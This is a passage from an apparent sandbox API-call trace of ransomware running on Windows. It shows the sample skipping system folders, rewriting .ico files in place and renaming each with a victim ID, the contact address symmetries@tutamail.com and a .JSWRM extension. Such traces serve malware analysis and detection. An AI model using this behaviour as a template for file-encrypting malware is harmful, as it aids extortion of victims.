"c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.490] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.490] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.490] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.492] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.492] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.492] CloseHandle (hObject=0x3d4) returned 1 [0060.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0060.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0060.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0060.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0060.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0060.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.493] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0060.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.493] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2=".") returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="..") returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="...") returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="windows") returned -1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="recovery") returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="perflogs") returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="documents and settings") returned 1 [0060.493] lstrcmpiW (lpString1="Rotate4.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.494] lstrcmpiW (lpString1="Rotate4.ico", lpString2="system volume information") returned -1 [0060.494] lstrcmpiW (lpString1="Rotate4.ico", lpString2="msocache") returned 1 [0060.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate4.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate4.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate4.ico", lpUsedDefaultChar=0x0) returned 11 [0060.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0060.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate4.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate4.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate4.ico", lpUsedDefaultChar=0x0) returned 11 [0060.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0060.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0060.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0060.494] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.495] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.495] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.495] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.496] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.496] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.496] CloseHandle (hObject=0x3d4) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.497] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0060.498] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2=".") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="..") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="...") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="windows") returned -1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="recovery") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="perflogs") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="documents and settings") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="system volume information") returned -1 [0060.498] lstrcmpiW (lpString1="Rotate5.ico", lpString2="msocache") returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0060.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate5.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate5.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate5.ico", lpUsedDefaultChar=0x0) returned 11 [0060.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0060.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate5.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate5.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate5.ico", lpUsedDefaultChar=0x0) returned 11 [0060.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0060.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0060.499] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.499] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.499] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.499] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.501] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.501] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.501] CloseHandle (hObject=0x3d4) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0060.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0060.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.502] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0060.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0060.503] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2=".") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="..") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="...") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="windows") returned -1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="recovery") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="perflogs") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="documents and settings") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="system volume information") returned -1 [0060.503] lstrcmpiW (lpString1="Rotate6.ico", lpString2="msocache") returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0060.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate6.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate6.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate6.ico", lpUsedDefaultChar=0x0) returned 11 [0060.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0060.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate6.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate6.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate6.ico", lpUsedDefaultChar=0x0) returned 11 [0060.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0060.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0060.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0060.504] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.504] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.504] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.504] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.505] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.505] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.506] CloseHandle (hObject=0x3d4) returned 1 [0060.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 